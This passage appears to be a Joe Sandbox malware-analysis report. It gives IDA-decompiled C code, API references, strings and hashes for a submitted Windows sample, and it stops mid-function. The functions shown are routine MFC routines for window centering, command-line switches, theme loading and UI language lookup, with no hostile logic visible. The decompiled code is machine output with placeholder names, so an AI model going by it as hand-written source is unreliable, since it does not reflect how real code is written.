      • API String ID: 339215182-3104936141
      • Opcode ID: ccb6324e5aba75378f1c138e9057d3953c971ab2409627af4622274678cc9682
      • Instruction ID: 8eb05263f6517e3a557d7cd90a0684060a5bd11edef49afe2920eb28b7ae4d48
      • Opcode Fuzzy Hash: ccb6324e5aba75378f1c138e9057d3953c971ab2409627af4622274678cc9682
      • Instruction Fuzzy Hash: B6C13870901228DBDB24DF64CD45BEDBBB5BF49310F1085EAF58DA6292DB344A88CF61
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 78%
      			E009AC2D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
      				signed int _v8;
      				struct tagRECT _v24;
      				struct tagRECT _v40;
      				struct tagRECT _v56;
      				struct tagRECT _v76;
      				char _v96;
      				signed int _v100;
      				intOrPtr _v104;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				signed int _t70;
      				signed int _t72;
      				struct tagMONITORINFO* _t73;
      				struct HMONITOR__* _t103;
      				void* _t108;
      				struct HMONITOR__* _t109;
      				signed int _t117;
      				struct tagMONITORINFO* _t118;
      				intOrPtr _t119;
      				struct tagMONITORINFO* _t120;
      				long _t121;
      				long _t126;
      				void* _t130;
      				intOrPtr _t131;
      				struct HWND__* _t132;
      				void* _t134;
      				struct tagMONITORINFO* _t136;
      				struct tagMONITORINFO* _t140;
      				signed int _t144;
      
      				_t130 = __edx;
      				_t70 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t70 ^ _t144;
      				_t119 = _a4;
      				_t131 = __ecx;
      				_v104 = __ecx;
      				_t72 = E009B0A7A(__ecx);
      				_t136 = 0;
      				_v100 = _t72;
      				if(_t119 == 0) {
      					if((_t72 & 0x40000000) == 0) {
      						_t73 = GetWindow( *(__ecx + 0x20), 4);
      					} else {
      						_t73 = GetParent( *(__ecx + 0x20));
      					}
      					_t120 = _t73;
      					if(_t120 != _t136) {
      						_t118 = SendMessageA(_t120, 0x36b, _t136, _t136);
      						if(_t118 != _t136) {
      							_t120 = _t118;
      						}
      					}
      				} else {
      					_t5 = _t119 + 0x20; // 0x9ab424
      					_t120 =  *_t5;
      				}
      				_v56.left = _t136;
      				_v56.top = _t136;
      				_v56.right = _t136;
      				_v56.bottom = _t136;
      				GetWindowRect( *(_t131 + 0x20),  &_v56);
      				_v24.left = _t136;
      				_v24.top = _t136;
      				_v24.right = _t136;
      				_v24.bottom = _t136;
      				_v40.left = _t136;
      				_v40.top = _t136;
      				_v40.right = _t136;
      				_v40.bottom = _t136;
      				if((_v100 & 0x40000000) != 0) {
      					_t132 = GetParent( *(_t131 + 0x20));
      					GetClientRect(_t132,  &_v24);
      					GetClientRect(_t120,  &_v40);
      					MapWindowPoints(_t120, _t132,  &_v40, 2);
      				} else {
      					if(_t120 != _t136) {
      						_t117 = GetWindowLongA(_t120, 0xfffffff0);
      						if((_t117 & 0x10000000) == 0 || (_t117 & 0x20000000) != 0) {
      							_t120 = 0;
      						}
      					}
      					_v96 = 0x28;
      					if(_t120 != _t136) {
      						GetWindowRect(_t120,  &_v40);
      						_t103 =  &_v96;
      						__imp__MonitorFromWindow(2, _t103);
      						GetMonitorInfoA(_t103, _t120);
      						CopyRect( &_v24,  &_v76);
      					} else {
      						_t108 = E009A6B56();
      						if(_t108 != _t136) {
      							_t136 =  *(_t108 + 0x20);
      						}
      						_t109 =  &_v96;
      						__imp__MonitorFromWindow(1, _t109);
      						GetMonitorInfoA(_t109, _t136);
      						CopyRect( &_v40,  &_v76);
      						CopyRect( &_v24,  &_v76);
      					}
      				}
      				_t121 = _v56.left;
      				asm("cdq");
      				_t134 = _v56.right - _t121;
      				asm("cdq");
      				_t126 = (_v40.right + _v40.left - _t130 >> 1) - (_t134 - _t130 >> 1);
      				_t135 = _t134 + _t126;
      				_v100 = _v56.bottom - _v56.top;
      				asm("cdq");
      				asm("cdq");
      				_t140 = (_v40.top + _v40.bottom - _t130 >> 1) - (_v100 - _t130 >> 1);
      				if(_t134 + _t126 > _v24.right) {
      					_t126 = _t121;
      				}
      				if(_t126 < _v24.left) {
      					_t126 = _v24.left;
      				}
      				if(_t140 + _v100 > _v24.bottom) {
      					_t140 = _v56.top - _v56.bottom + _v24.bottom;
      				}
      				if(_t140 < _v24.top) {
      					_t140 = _v24.top;
      				}
      				return E00AAB46A(E009B0DD3(_v104, 0, _t126, _t140, 0xffffffff, 0xffffffff, 0x15), _t121, _v8 ^ _t144, _t130, _t135, _t140);
			}

      0x009ac2d5
      0x009ac2dd
      0x009ac2e4
      0x009ac2e8
      0x009ac2ed
      0x009ac2ef
      0x009ac2f2
      0x009ac2f7
      0x009ac2f9
      0x009ac2fe
      0x009ac30a
      0x009ac31c
      0x009ac30c
      0x009ac30f
      0x009ac30f
      0x009ac322
      0x009ac326
      0x009ac330
      0x009ac338
      0x009ac33a
      0x009ac33a
      0x009ac338
      0x009ac300
      0x009ac300
      0x009ac300
      0x009ac300
      0x009ac343
      0x009ac346
      0x009ac349
      0x009ac34c
      0x009ac34f
      0x009ac35c
      0x009ac35f
      0x009ac362
      0x009ac365
      0x009ac368
      0x009ac36b
      0x009ac36e
      0x009ac371
      0x009ac374
      0x009ac41c
      0x009ac423
      0x009ac42a
      0x009ac434
      0x009ac37a
      0x009ac37c
      0x009ac381
      0x009ac38c
      0x009ac395
      0x009ac395
      0x009ac38c
      0x009ac397
      0x009ac3a0
      0x009ac3e3
      0x009ac3e9
      0x009ac3f0
      0x009ac3f7
      0x009ac405
      0x009ac3a2
      0x009ac3a2
      0x009ac3a9
      0x009ac3ab
      0x009ac3ab
      0x009ac3ae
      0x009ac3b5
      0x009ac3bc
      0x009ac3d0
      0x009ac3da
      0x009ac3da
      0x009ac3a0
      0x009ac443
      0x009ac446
      0x009ac44b
      0x009ac44f
      0x009ac456
      0x009ac45e
      0x009ac460
      0x009ac469
      0x009ac471
      0x009ac478
      0x009ac47d
      0x009ac485
      0x009ac485
      0x009ac48a
      0x009ac48c
      0x009ac48c
      0x009ac497
      0x009ac49f
      0x009ac49f
      0x009ac4a5
      0x009ac4a7
      0x009ac4a7
      0x009ac4ca

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Rect$Monitor$Copy$FromInfoLong$MessageParentSend
      • String ID: (
      • API String ID: 783970248-3887548279
      • Opcode ID: 2470796f728b8c161719aebdd4d0abb80b806f4b2b7838b1545f4b9f394242ae
      • Instruction ID: d527d600a58b3a1dc94c771957deada2eee2ba6dfccca1178e4db6da21683f62
      • Opcode Fuzzy Hash: 2470796f728b8c161719aebdd4d0abb80b806f4b2b7838b1545f4b9f394242ae
      • Instruction Fuzzy Hash: 5A6118B1901229ABCF00DFE8DD88AEEBBB9FF49710F154516E506F7255CB70A901CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 93%
      			E009B269A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				int _t30;
      				int _t33;
      				int _t34;
      				int _t35;
      				CHAR* _t37;
      				void* _t39;
      				CHAR* _t43;
      				void* _t60;
      				void* _t62;
      				void* _t64;
      				void* _t72;
      				void* _t76;
      				void* _t77;
      
      				_t72 = __edx;
      				_push(4);
      				E00AAD232(0xacc860, __ebx, __edi, __esi);
      				_t76 = __ecx;
      				_t43 =  *(_t77 + 8);
      				if(lstrcmpA(_t43, "pt") != 0) {
      					_t30 = lstrcmpA(_t43, "p");
      					__eflags = _t30;
      					if(_t30 != 0) {
      						_t30 = E009AB7F1(_t43, "Register");
      						__eflags = _t30;
      						if(_t30 == 0) {
      							L28:
      							 *((intOrPtr*)(_t76 + 0x14)) = 6;
      						} else {
      							_t30 = E009AB7F1(_t43, "Regserver");
      							__eflags = _t30;
      							if(_t30 == 0) {
      								goto L28;
      							} else {
      								_t30 = E009AB7F1(_t43, "RegisterPerUser");
      								__eflags = _t30;
      								if(_t30 == 0) {
      									L27:
      									 *((intOrPtr*)(_t76 + 0x10)) = 1;
      									goto L28;
      								} else {
      									_t30 = E009AB7F1(_t43, "RegserverPerUser");
      									__eflags = _t30;
      									if(_t30 == 0) {
      										goto L27;
      									} else {
      										_t30 = E009AB7F1(_t43, "Unregister");
      										__eflags = _t30;
      										if(_t30 == 0) {
      											L26:
      											 *((intOrPtr*)(_t76 + 0x14)) = 7;
      										} else {
      											_t30 = E009AB7F1(_t43, "Unregserver");
      											__eflags = _t30;
      											if(_t30 == 0) {
      												goto L26;
      											} else {
      												_t30 = E009AB7F1(_t43, "UnregisterPerUser");
      												__eflags = _t30;
      												if(_t30 == 0) {
      													L25:
      													 *((intOrPtr*)(_t76 + 0x14)) = 7;
      													 *((intOrPtr*)(_t76 + 0x10)) = 1;
      												} else {
      													_t30 = E009AB7F1(_t43, "UnregserverPerUser");
      													_pop(_t60);
      													__eflags = _t30;
      													if(_t30 == 0) {
      														goto L25;
      													} else {
      														__eflags = E00AAF5F8(_t43, "RestartByRestartManager", 0x17);
      														if(__eflags != 0) {
      															_t33 = lstrcmpA(_t43, "ddenoshow");
      															__eflags = _t33;
      															if(_t33 != 0) {
      																_t34 = lstrcmpA(_t43, "dde");
      																__eflags = _t34;
      																if(_t34 != 0) {
      																	_t35 = E009AB7F1(_t43, "Embedding");
      																	_pop(_t62);
      																	__eflags = _t35;
      																	if(_t35 != 0) {
      																		_t30 = E009AB7F1(_t43, "Automation");
      																		_pop(_t64);
      																		__eflags = _t30;
      																		if(_t30 == 0) {
      																			_t30 = E009BE782(_t64, _t30);
      																			 *((intOrPtr*)(_t76 + 0xc)) = 1;
      																			goto L22;
      																		}
      																	} else {
      																		_t30 = E009BE782(_t62, _t35);
      																		 *((intOrPtr*)(_t76 + 8)) = 1;
      																		L22:
      																		 *(_t76 + 4) =  *(_t76 + 4) & 0x00000000;
      																	}
      																} else {
      																	_t30 = E009BE782(_t60, _t34);
      																	 *((intOrPtr*)(_t76 + 0x14)) = 4;
      																}
      															} else {
      																_t30 = E009BE782(_t60, _t33);
      																 *((intOrPtr*)(_t76 + 0x14)) = 5;
      															}
      														} else {
      															_push(_t43);
      															E009AFB60(_t43, _t77 + 8, _t72, lstrcmpA, _t76, __eflags);
      															_t37 =  *(_t77 + 8);
      															 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
      															__eflags =  *((intOrPtr*)(_t37 - 0xc)) - 0x3c;
      															if( *((intOrPtr*)(_t37 - 0xc)) == 0x3c) {
      																 *((intOrPtr*)(_t76 + 0x14)) = 8;
      																_t39 = E009B22E5(_t77 + 8, _t72, _t77 - 0x10, 0x24);
      																 *(_t77 - 4) = 1;
      																E009B2357(_t43, _t76 + 0x28, _t39);
      																__eflags =  *((intOrPtr*)(_t77 - 0x10)) + 0xfffffff0;
      																E009A5510( *((intOrPtr*)(_t77 - 0x10)) + 0xfffffff0, _t72);
      															}
      															_t30 = E009A5510( &(( *(_t77 + 8))[0xfffffffffffffff0]), _t72);
      														}
      													}
      												}
      											}
      										}
      									}
      								}
      							}
      						}
      					} else {
      						 *((intOrPtr*)(_t76 + 0x14)) = 2;
      					}
      				} else {
      					 *((intOrPtr*)(_t76 + 0x14)) = 3;
      				}
      				return E00AAD30A(_t30);
			}

      0x009b269a
      0x009b269a
      0x009b26a1
      0x009b26a6
      0x009b26a8
      0x009b26bb
      0x009b26cf
      0x009b26d1
      0x009b26d3
      0x009b26e7
      0x009b26ee
      0x009b26f0
      0x009b288d
      0x009b288d
      0x009b26f6
      0x009b26fc
      0x009b2703
      0x009b2705
      0x00000000
      0x009b270b
      0x009b2711
      0x009b2718
      0x009b271a
      0x009b2886
      0x009b2886
      0x00000000
      0x009b2720
      0x009b2726
      0x009b272d
      0x009b272f
      0x00000000
      0x009b2735
      0x009b273b
      0x009b2742
      0x009b2744
      0x009b287d
      0x009b287d
      0x009b274a
      0x009b2750
      0x009b2757
      0x009b2759
      0x00000000
      0x009b275f
      0x009b2765
      0x009b276c
      0x009b276e
      0x009b286d
      0x009b286d
      0x009b2874
      0x009b2774
      0x009b277a
      0x009b2780
      0x009b2781
      0x009b2783
      0x00000000
      0x009b2789
      0x009b2799
      0x009b279b
      0x009b27f6
      0x009b27f8
      0x009b27fa
      0x009b2814
      0x009b2816
      0x009b2818
      0x009b282f
      0x009b2835
      0x009b2836
      0x009b2838
      0x009b2853
      0x009b2859
      0x009b285a
      0x009b285c
      0x009b285f
      0x009b2864
      0x00000000
      0x009b2864
      0x009b283a
      0x009b283b
      0x009b2840
      0x009b2847
      0x009b2847
      0x009b2847
      0x009b281a
      0x009b281b
      0x009b2820
      0x009b2820
      0x009b27fc
      0x009b27fd
      0x009b2802
      0x009b2802
      0x009b279d
      0x009b279d
      0x009b27a1
      0x009b27a6
      0x009b27a9
      0x009b27ad
      0x009b27b1
      0x009b27bc
      0x009b27c3
      0x009b27cc
      0x009b27d0
      0x009b27d8
      0x009b27db
      0x009b27db
      0x009b27e6
      0x009b27e6
      0x009b279b
      0x009b2783
      0x009b276e
      0x009b2759
      0x009b2744
      0x009b272f
      0x009b271a
      0x009b2705
      0x009b26d5
      0x009b26d5
      0x009b26d5
      0x009b26bd
      0x009b26bd
      0x009b26bd
      0x009b2899

      APIs
      • __EH_prolog3.LIBCMT ref: 009B26A1
      • lstrcmpA.KERNEL32(?,00AD9348,00000004), ref: 009B26B7
      • lstrcmpA.KERNEL32(?,00AD9344), ref: 009B26CF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: lstrcmp$H_prolog3
      • String ID: Automation$Embedding$Register$RegisterPerUser$Regserver$RegserverPerUser$RestartByRestartManager$Unregister$UnregisterPerUser$Unregserver$UnregserverPerUser$dde$ddenoshow
      • API String ID: 477540313-844245956
      • Opcode ID: 9535eba39c1fb3de22c8dcebfd6d869f86d20d16fa455ac0398cd0c83162315b
      • Instruction ID: af36989302fb2820e0b7d12e7f6360d7adb6ca95c2602eb72bb08e746dcf6495
      • Opcode Fuzzy Hash: 9535eba39c1fb3de22c8dcebfd6d869f86d20d16fa455ac0398cd0c83162315b
      • Instruction Fuzzy Hash: 1141C3B114870276D724AB35DE86FD7329CEF41774F20091EF507A99C2EFB8E54486A4
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 96%
      			E009EA5AF(intOrPtr* __ecx, void* __eflags) {
      				void* __esi;
      				struct HINSTANCE__* _t40;
      				intOrPtr* _t55;
      
      				_t55 = __ecx;
      				_push(L"UxTheme.dll");
      				 *__ecx = 0xadf3c8;
      				 *((intOrPtr*)(__ecx + 4)) = 0;
      				 *((intOrPtr*)(__ecx + 8)) = 0;
      				 *((intOrPtr*)(__ecx + 0x10)) = 0;
      				 *((intOrPtr*)(__ecx + 0x14)) = 0;
      				 *((intOrPtr*)(__ecx + 0xc)) = 0;
      				 *((intOrPtr*)(__ecx + 0x18)) = 0;
      				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
      				 *((intOrPtr*)(__ecx + 0x20)) = 0;
      				 *((intOrPtr*)(__ecx + 0x24)) = 0;
      				 *((intOrPtr*)(__ecx + 0x28)) = 0;
      				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
      				 *((intOrPtr*)(__ecx + 0x30)) = 0;
      				 *((intOrPtr*)(__ecx + 0x34)) = 0;
      				 *((intOrPtr*)(__ecx + 0x38)) = 0;
      				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
      				 *((intOrPtr*)(__ecx + 0x40)) = 0;
      				 *((intOrPtr*)(__ecx + 0x44)) = 0;
      				 *((intOrPtr*)(__ecx + 0x48)) = 0;
      				_t40 = E009AB76B(__ecx, __ecx, __eflags);
      				 *(__ecx + 0x4c) = _t40;
      				if(_t40 == 0) {
      					 *((intOrPtr*)(__ecx + 0x50)) = 0;
      					 *((intOrPtr*)(__ecx + 0x54)) = 0;
      					 *((intOrPtr*)(__ecx + 0x58)) = 0;
      					 *((intOrPtr*)(__ecx + 0x5c)) = 0;
      					 *((intOrPtr*)(__ecx + 0x60)) = 0;
      					 *((intOrPtr*)(__ecx + 0x64)) = 0;
      					 *((intOrPtr*)(__ecx + 0x68)) = 0;
      				} else {
      					 *((intOrPtr*)(_t55 + 0x50)) = GetProcAddress(_t40, "OpenThemeData");
      					 *((intOrPtr*)(_t55 + 0x54)) = GetProcAddress( *(_t55 + 0x4c), "CloseThemeData");
      					 *((intOrPtr*)(_t55 + 0x58)) = GetProcAddress( *(_t55 + 0x4c), "DrawThemeBackground");
      					 *((intOrPtr*)(_t55 + 0x5c)) = GetProcAddress( *(_t55 + 0x4c), "GetThemeColor");
      					 *((intOrPtr*)(_t55 + 0x60)) = GetProcAddress( *(_t55 + 0x4c), "GetThemeSysColor");
      					 *((intOrPtr*)(_t55 + 0x64)) = GetProcAddress( *(_t55 + 0x4c), "GetCurrentThemeName");
      					 *((intOrPtr*)(_t55 + 0x68)) = GetProcAddress( *(_t55 + 0x4c), "GetWindowTheme");
      					E009E9D83(_t55);
      				}
      				return _t55;
      			}

      APIs
        • Part of subcall function 009AB76B: ActivateActCtx.KERNEL32(?,?,00B0BB10,00000010), ref: 009AB78B
      • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 009EA611
      • GetProcAddress.KERNEL32(?,CloseThemeData), ref: 009EA61E
      • GetProcAddress.KERNEL32(?,DrawThemeBackground), ref: 009EA62B
      • GetProcAddress.KERNEL32(?,GetThemeColor), ref: 009EA638
      • GetProcAddress.KERNEL32(?,GetThemeSysColor), ref: 009EA645
      • GetProcAddress.KERNEL32(?,GetCurrentThemeName), ref: 009EA652
      • GetProcAddress.KERNEL32(?,GetWindowTheme), ref: 009EA65F
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$Activate
      • String ID: CloseThemeData$DrawThemeBackground$GetCurrentThemeName$GetThemeColor$GetThemeSysColor$GetWindowTheme$OpenThemeData$UxTheme.dll
      • API String ID: 2388279185-1975976892
      • Opcode ID: 0da41f3d63796c414c1ac2c55432cdf3771d014b60a406beaf3b5e659bdfc8e9
      • Instruction ID: 44b0163291207b8a7969004042a4e234663790bf99cd496bc9f87ea71841100d
      • Opcode Fuzzy Hash: 0da41f3d63796c414c1ac2c55432cdf3771d014b60a406beaf3b5e659bdfc8e9
      • Instruction Fuzzy Hash: CA3133B0941B90AFC631AF6B994580BFAF9BEA4B143118D2FA58782B20D7B5A441DE41
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 73%
      			E009B1BA3(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
      				signed int _v8;
      				char _v210;
      				char _v212;
      				short _v216;
      				char _v476;
      				int _v580;
      				intOrPtr _v584;
      				char _v588;
      				intOrPtr _v592;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t48;
      				struct HINSTANCE__* _t52;
      				signed int _t53;
      				signed short _t57;
      				signed int _t58;
      				void* _t77;
      				intOrPtr _t78;
      				signed int _t82;
      				signed int _t84;
      				void* _t93;
      				signed int _t94;
      				struct HINSTANCE__* _t95;
      				short* _t96;
      				signed int _t98;
      				void* _t99;
      				void* _t100;
      				signed int _t102;
      				signed int _t104;
      				void* _t105;
      				void* _t107;
      
      				_t102 = _t104;
      				_t105 = _t104 - 0x24c;
      				_t48 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t48 ^ _t102;
      				_v584 = _a4;
      				_push("KERNEL32.DLL");
      				_v592 = _a8;
      				_t98 = 0;
      				_t52 = E009AB6E5(__ecx, 0, __eflags);
      				if(_t52 != 0) {
      					_t52 = GetProcAddress(_t52, "GetThreadPreferredUILanguages");
      					_t95 = _t52;
      					if(_t95 != 0) {
      						_v212 = 0;
      						_v588 = 0;
      						E00AAB3F0( &_v210, 0, 0xc8);
      						_t107 = _t105 + 0xc;
      						_v580 = 0x65;
      						_t52 = _t95->i(0x34,  &_v588,  &_v212,  &_v580);
      						if(_t52 != 0) {
      							_t96 =  &_v212;
      							if(_v212 != 0) {
      								while(_t98 < 0x14) {
      									_t78 = E00AAF43D(_t96, 0, 0x10);
      									_t107 = _t107 + 0xc;
      									_t114 = _t78;
      									if(_t78 != 0 &&  *((intOrPtr*)(E00AADB06(_t114))) != 0x22) {
      										 *((intOrPtr*)(_t102 + _t98 * 4 - 0x23c)) = _t78;
      										_t98 = _t98 + 1;
      									}
      									_t52 = E00AAF260(_t96);
      									_t96 = _t96 + 2 + _t52 * 2;
      									if( *_t96 != 0) {
      										continue;
      									}
      									goto L10;
      								}
      							}
      						}
      					}
      				}
      				L10:
      				__imp__GetUserDefaultUILanguage();
      				_t53 = _t52 & 0x0000ffff;
      				_t82 = _t53 & 0x000003ff;
      				_v580 = _t82;
      				 *((intOrPtr*)(_t102 + _t98 * 4 - 0x23c)) = ConvertDefaultLocale(_t53 & 0x0000fc00 | _t82);
      				_t57 = ConvertDefaultLocale(_v580);
      				 *(_t102 + _t98 * 4 - 0x238) = _t57;
      				__imp__GetSystemDefaultUILanguage();
      				_t58 = _t57 & 0x0000ffff;
      				_t84 = _t58 & 0x000003ff;
      				_v580 = _t84;
      				 *((intOrPtr*)(_t102 + _t98 * 4 - 0x234)) = ConvertDefaultLocale(_t58 & 0x0000fc00 | _t84);
      				 *((intOrPtr*)(_t102 + _t98 * 4 - 0x230)) = ConvertDefaultLocale(_v580);
      				 *((intOrPtr*)(_t102 + _t98 * 4 - 0x22c)) = 0x800;
      				_t99 = _t98 + 5;
      				_v216 = 0;
      				if(GetModuleFileNameA(0x9a0000,  &_v476, 0x105) == 0) {
      					L14:
      				} else {
      					_t94 = 0;
      					if(_t99 <= 0) {
      						goto L14;
      					} else {
      						while(1) {
      							_t90 = _v592;
      							if(E009B1AD1(_v584, _v592,  *((intOrPtr*)(_t102 + _t94 * 4 - 0x23c))) != 0) {
      								goto L15;
      							}
      							_t94 = _t94 + 1;
      							if(_t94 < _t99) {
      								continue;
      							} else {
      								goto L14;
      							}
      							goto L15;
      						}
      					}
      				}
      				L15:
      				_pop(_t93);
      				_pop(_t100);
      				_pop(_t77);
      				return E00AAB46A(0, _t77, _v8 ^ _t102, _t90, _t93, _t100);
      			}

      APIs
        • Part of subcall function 009AB6E5: ActivateActCtx.KERNEL32(?,?,00B0BAF0,00000010,009ABB5C,user32.dll,00000000,009ACA56,00000000,00000000), ref: 009AB705
      • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 009B1BE8
      • _memset.LIBCMT ref: 009B1C14
      • _wcstoul.LIBCMT ref: 009B1C5C
        • Part of subcall function 00AAF43D: wcstoxl.LIBCMT ref: 00AAF44D
      • _wcslen.LIBCMT ref: 009B1C7D
        • Part of subcall function 00AADB06: __getptd_noexit.LIBCMT ref: 00AADB06
      • GetUserDefaultUILanguage.KERNEL32 ref: 009B1C8D
      • ConvertDefaultLocale.KERNEL32(?), ref: 009B1CB4
      • ConvertDefaultLocale.KERNEL32(?), ref: 009B1CC3
      • GetSystemDefaultUILanguage.KERNEL32 ref: 009B1CCC
      • ConvertDefaultLocale.KERNEL32(?), ref: 009B1CE8
      • ConvertDefaultLocale.KERNEL32(?), ref: 009B1CF7
      • GetModuleFileNameA.KERNEL32(009A0000,?,00000105), ref: 009B1D28
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Default$ConvertLocale$Language$ActivateAddressFileModuleNameProcSystemUser__getptd_noexit_memset_wcslen_wcstoulwcstoxl
      • String ID: GetThreadPreferredUILanguages$KERNEL32.DLL$e
      • API String ID: 2246399177-2285706205
      • Opcode ID: 51abf7abbb5b952027a705bacf0c1f3f3c34bf85920033d57c736e0e8c7d8b6e
      • Instruction ID: 7312292a8025d92faf01733934cb0239f88e8ff9b4d13ac7f4246b53330daeca
      • Opcode Fuzzy Hash: 51abf7abbb5b952027a705bacf0c1f3f3c34bf85920033d57c736e0e8c7d8b6e
      • Instruction Fuzzy Hash: 9741A571901228ABCB60EFA4DD89BEE77B8EF44710F4105AAE90DE7180D7749E81CF60
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009A7ECC(RECT* __ecx, struct HWND__* _a4, signed int _a8) {
      				signed int _v8;
      				RECT* _v12;
      				int _v16;
      				intOrPtr _v20;
      				void* __ebp;
      				intOrPtr _t72;
      				RECT** _t74;
      				int _t76;
      				intOrPtr _t77;
      				int _t80;
      				intOrPtr _t88;
      				struct HWND__* _t91;
      				struct HWND__* _t96;
      				struct HMENU__* _t98;
      				struct HWND__* _t99;
      				int _t104;
      				RECT* _t116;
      				int* _t118;
      				RECT* _t130;
      				RECT* _t133;
      				signed int _t151;
      
      				_t119 = __ecx;
      				_t118 = _a8;
      				_t130 = 0;
      				_t133 = __ecx;
      				if(_t118 != 0) {
      					L2:
      					_t72 =  *((intOrPtr*)(_t133->left + 0x16c))();
      					_v20 = _t72;
      					if(_t72 != _t130) {
      						if(_a4 != _t130 &&  *(_t72 + 0xa0) != _t130) {
      							_t116 =  *(_t72 + 0xa0);
      							_t129 = _t116->left;
      							_t119 = _t116;
      							 *((intOrPtr*)(_t116->left + 0x5c))(_t130);
      						}
      						_t74 =  *(_t133 + 0xa8);
      						_a8 = _t130;
      						if(_t74 == _t130) {
      							L18:
      							_t118[2] = _a8;
      							if(_a4 == _t130) {
      								 *(_t133 + 0xd4) = _t130;
      								_t76 = GetDlgItem( *(_t133 + 0x20), 0xea21);
      								_a4 = _t76;
      								__eflags = _t76;
      								if(_t76 != 0) {
      									_t91 = GetDlgItem( *(_t133 + 0x20), 0xe900);
      									__eflags = _t91;
      									if(_t91 != 0) {
      										SetWindowLongA(_t91, 0xfffffff4, 0xea21);
      									}
      									SetWindowLongA(_a4, 0xfffffff4, 0xe900);
      								}
      								__eflags = _t118[1];
      								if(_t118[1] != 0) {
      									InvalidateRect( *(_t133 + 0x20), 0, 1);
      									_t88 =  *((intOrPtr*)(_t133 + 0xf4));
      									__eflags = _t88 - 1;
      									if(_t88 != 1) {
      										__eflags = _t88 - 2;
      										if(_t88 == 2) {
      											 *(_t133 + 0xf8) = _t118[1];
      										}
      									} else {
      										SetMenu( *(_t133 + 0x20), _t118[1]);
      									}
      								}
      								_t77 = _v20;
      								__eflags =  *(_t77 + 0xa0);
      								if( *(_t77 + 0xa0) != 0) {
      									_t129 =  *( *(_t77 + 0xa0));
      									 *((intOrPtr*)( *( *(_t77 + 0xa0)) + 0x5c))(1);
      								}
      								 *((intOrPtr*)(_t133->left + 0x174))(1);
      								_t80 =  *_t118;
      								__eflags = _t80 - 0xe900;
      								if(_t80 != 0xe900) {
      									_a4 = GetDlgItem( *(_t133 + 0x20), _t80);
      								}
      								ShowWindow(_a4, 5);
      								 *(_t133 + 0x80) = _t118[5];
      								return E009A653C(_t133, _t129, 1);
      							}
      							 *(_t133 + 0xd4) = _t118[4];
      							E009A653C(_t133, _t129, _t130);
      							_t96 = GetDlgItem( *(_t133 + 0x20),  *_t118);
      							_a4 = _t96;
      							ShowWindow(_t96, _t130);
      							if( *((intOrPtr*)(_t133 + 0xf4)) != 1) {
      								_t98 =  *(_t133 + 0xf8);
      							} else {
